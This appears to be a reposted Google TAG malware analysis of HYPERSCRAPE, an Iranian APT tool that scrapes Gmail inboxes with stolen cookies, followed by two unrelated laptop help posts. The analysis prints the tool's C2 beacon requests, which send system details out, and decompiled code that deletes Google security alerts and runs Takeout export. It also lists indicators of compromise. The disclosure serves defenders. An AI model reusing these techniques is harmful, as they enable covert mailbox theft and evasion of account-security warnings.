Skip to main content

New Iranian APT data extraction tool

As part of TAG's mission to counter serious threats to Google and our users, we've analyzed a range of persistent threats including APT35 and Charming Kitten, an Iranian government-backed group that regularly targets high risk users. For years, we have been countering this group’s efforts to hijack accounts, deploy malware, and their use of novel techniques to conduct espionage aligned with the interests of the Iranian government. Now, we’re shining light on a new tool of theirs.

In December 2021, TAG discovered a novel Charming Kitten tool, named HYPERSCRAPE, used to steal user data from Gmail, Yahoo!, and Microsoft Outlook accounts. The attacker runs HYPERSCRAPE on their own machine to download victims’ inboxes using previously acquired credentials. We have seen it deployed against fewer than two dozen accounts located in Iran. The oldest known sample is from 2020, and the tool is still under active development. We have taken actions to re-secure these accounts and have notified the victims through our Government Backed Attacker Warnings.

This post will provide technical details about HYPERSCRAPE, similar to PWC’s recently published analysis on a Telegram grabber tool. HYPERSCRAPE demonstrates Charming Kitten’s commitment to developing and maintaining purpose-built capabilities. Like much of their tooling, HYPERSCRAPE is not notable for its technical sophistication, but rather its effectiveness in accomplishing Charming Kitten’s objectives.

HYPERSCRAPE Analysis

HYPERSCRAPE requires the victim’s account credentials to run using a valid, authenticated user session the attacker has hijacked, or credentials the attacker has already acquired. It spoofs the user agent to look like an outdated browser, which enables the basic HTML view in Gmail. Once logged in, the tool changes the account’s language settings to English and iterates through the contents of the mailbox, individually downloading messages as .eml files and marking them unread. After the program has finished downloading the inbox, it reverts the language back to its original settings and deletes any security emails from Google. Earlier versions contained the option to request data from Google Takeout, a feature which allows users to export their data to a downloadable archive file.

The tool is written in .NET for Windows PCs and is designed to run on the attacker's machine. We tested HYPERSCRAPE in a controlled environment with a test Gmail Account, although functionality may differ for Yahoo! and Microsoft accounts. HYPERSCRAPE won't run unless in a directory with other file dependencies.

HYPERSCRAPE file metadata

HYPERSCRAPE file metadata

HYPERSCRAPE Setup

When launched, the tool makes an HTTP GET request to a C2 to check for a response body of "OK'' and will terminate if it's not found. In the version tested, the C2 was unobfuscated and stored as a hardcoded string. In later versions it was obfuscated with Base64.

GET http://{C2}/Index.php?Ck=OK HTTP/1.1

Host: {C2}

Accept-Encoding: gzip

Connection: Keep-Alive

The tool accepts arguments from the command line such as the mode of operation, an identifier string, and a path string to a valid cookie file. A new form is displayed if the information is not provided via command prompt.

Image of a form specifying operation parameters

Initial form to specify operation parameters

Once provided, the data in the "Identity" field is sent to a C2 for confirmation. Again, the response is expected to be "OK".

GET http://{C2}/Index.php?vubc={identity} HTTP/1.1

Host: {C2}

Accept-Encoding: gzip

If the cookie file path was not supplied via the command line, a new form will allow the operator to do so using drag and drop.

An image showing a cookie drag and drop form

The cookie drag and drop form

After parsing, the cookies are inserted into a local cache used by the embedded web browser. A new folder named "Download" is created adjacent to the main binary. The browser then navigates to Gmail to begin the data collection.

The user agent is spoofed so it appears like an outdated browser, which results in an error message and allows the attacker to enable the basic HTML view in Gmail.

Image of an error page from using an unsupported browser

The error page from using an unsupported browser

screenshot of code

If the cookies failed to provide access to the account, a login page is displayed and the attacker can manually enter credentials to proceed, as the program will wait until it finds the inbox page.

Image of the login page

The login page

screenshot of code

What HYPERSCRAPE does

Once the attacker has logged in to the victim’s account, HYPERSCRAPE checks to see if the language is set to English, changing it if not. The language is returned to its original setting when the run is finished.

HYPERSCRAPE then begins iterating through all available tabs in the inbox looking for emails to download. It does the following for each email found:

  • Clicks on the email and opens it
  • Downloads it
  • If the email was originally unread, marks it unread
  • Goes back to the inbox

The emails are saved with ".eml" extensions under the Downloads directory with the filename corresponding to the subject. A log file is written containing a count of the emails that were downloaded.

screen shot of code
screen shot of "operation done" image

When finished, a HTTP POST request is made to the C2 to relay the status and system information. The downloaded emails are not sent to the C2.

POST http://{C2}/?Key={GUID}&Crc={Identifier}

{

"appName": "Gmail Downloader",

"targetname": "{Email}",

"HostName": "REDACTED",

"srcUserIP": "REDACTED",

"actionType": "First",

"timeOccurrence": "05/01/2022 05:50:31 PM",

"OS": "REDACTED",

"OSVersion": "REDACTED",

"SystemModel": "REDACTED",

"SystemType": "REDACTED",

"srcName": "REDACTED",

"srcOrgName": "REDACTED"

}

The program will delete any security emails from Google generated by the attacker’s activity.

private bool IsThereAnyEMail() {

List < GeckoHtmlElement > list = (from x in this.geckoWebBrowser.Document.GetElementsByTagName("span")

where x.TextContent.StartsWith ("Security alert") || x.TextContent.StartsWith("Archive of Google data requested") || x.TextContent.StartsWith("Your Google data archive is ready") || x.TextContent.StartsWith("Your Google data is ready") || x.TextContent.StartsWith("Critical security alert") || x.TextContent.StartsWith("Access for less secure apps has been turned on") || x.TextContent.StartsWith("Review blocked sign-in attempt") || x.TextContent.StartsWith("Help us protect you: Security advice from Google") || x.TextContent.StartsWith("Access for less secure apps has been turned on")

select x).ToList < GeckoHtmlElement > ();

bool flag = list.Count == 0;

return !flag;

}

Early versions contained an option to request Google Takeout data

Data from Google Takeout is also available upon request, but the option was only found in early builds. The functionality was not automated and it's unclear why it was removed in later versions.

When conducting a Takeout, the program will spawn a new copy of itself and initialize a pipe communication channel to relay the cookies and account name, both of which are required to accomplish the Takeout. When they are received, the browser navigates to the official Takeout link to request and eventually download the exported data.

public void ManageTakeOut() {

string text = "PipeName";

Process process = new Process();

process.StartInfo.Arguments = string.Format("PIPE Google \"{0}\"", text);

process.StartInfo.FileName = Process.GetCurrentProcess().MainModule.FileName;

process.Start();

PipeCommunication pipeCommunication = new PipeCommunication(true, text);

bool flag = false;

while (!flag) {

try {

JsonInfo jsonInfo = pipeCommunication.Read();

switch (jsonInfo.Type) {

case JsonType.GetCookies:

jsonInfo.Data = this.CookieText;

pipeCommunication.Write(jsonInfo);

break;

case JsonType.TakeOutFile:

flag = true;

break;

case JsonType.GetUsername:

while (this.OperationObject.GetUsername() == null) {

Thread.Sleep(1000);

}

jsonInfo.Data = this.OperationObject.GetUsername();

pipeCommunication.Write(jsonInfo);

break;

}

} catch (Exception) {

bool hasExited = process.HasExited;

if (hasExited) {

flag = true;

}

}

}

pipeCommunication.Close();

}

Protecting Our Users

TAG is committed to sharing research to raise awareness on bad actors like Charming Kitten within the security community, and for companies and individuals that may be targeted. It’s why we do things like work with our CyberCrime Investigation Group to share critical information relevant to law enforcement. We hope doing so will improve understanding of tactics and techniques that will enhance threat hunting capabilities and lead to stronger protections across the industry. We’ll also continue to apply those findings internally to improve the safety and security of our products so we can effectively combat threats and protect users who rely on our services. In the meantime, we encourage high risk users to enroll in our Advanced Protection Program (APP) and utilize Google Account Level Enhanced Safe Browsing to ensure they have the greatest level of protection in the face of ongoing threats.

HYPERSCRAPE Indicators

C2s

136.243.108.14

173.209.51.54

HYPERSCRAPE binaries

03d0e7ad4c12273a42e4c95d854408b98b0cf5ecf5f8c5ce05b24729b6f4e369

35a485972282b7e0e8e3a7a9cbf86ad93856378fd96cc8e230be5099c4b89208

5afc59cd2b39f988733eba427c8cf6e48bd2e9dc3d48a4db550655efe0dca798

6dc0600de00ba6574488472d5c48aa2a7b23a74ff1378d8aee6a93ea0ee7364f

767bd025c8e7d36f64dbd636ce0f29e873d1e3ca415d5ad49053a68918fe89f4

977f0053690684eb509da27d5eec2a560311c084a4a133191ef387e110e8b85f

ac8e59e8abeacf0885b451833726be3e8e2d9c88d21f27b16ebe00f00c1409e6

cd2ba296828660ecd07a36e8931b851dda0802069ed926b3161745aae9aa6daa

Microsoft Live DLL

1a831a79a932edd0398f46336712eff90ebb5164a189ef38c4dacc64ba84fe23

PDB

E:\Working\Projects\EmailDownloader\EmailDownloaderCookieMode\EmailDownloader\obj\Debug\EmailDownloader.pdb

E:\Working\Projects\EmailDownloader\EmailDownloaderCookieMode\Mahdi\LiveLib\obj\Release\LiveLib.pdb


by Ajax BashThreat Analysis Group via The Keyword

Comments

Popular posts from this blog

certain keys on my keyboard dont work when "cold"

Hi guys, i have a Lenovo Y520-15IKBN (80WK) and certain keys on the keyboard don't work (e,g,h,8,9,Fn...) but only when the weather is cold. for example in the winter it used to work after certain amount of time when i first boot the laptop and stops working when i stop using it for a while, but now that the weather is hot it works just fine except for the first couple of minutes or when its colder. of course i do realise that it has nothing to do with the outside weather but with the temperature of the computer itself. can someone explain to me why this is happening and how it should be fixed as i cannot take it to the tech service until july even though it's still under warranty because i need it for school. ps: an external keyboard works fine. Submitted April 29, 2018 at 03:35PM by AMmej https://ift.tt/2KiQg05

Old PC with a Foxconn n15235 motherboard needs drivers! Help!!

So my Pc corrupted and I had to fresh install windows on it, but now its missing 3 drivers and one of them is for the Ethernet controller! I've tried searching everywhere for the windows 7 drivers but all I seem to find are some dodgey programs saying they will install it for me. Problem is without the ethernet driver I can't bloody connect to the internet. I've been using a USB to try get some drivers on there, but they just end up being useless programmes . I'm also a bit of a noob at these things, I don't understand where to find the names of things in my PC, I've opened it up but I don't understand whats significant and what isnt. If someone has the drivers and can teach me how to install them I'd be very appreciative! Submitted April 29, 2018 at 02:47PM by darrilsteady https://ift.tt/2r76xMZ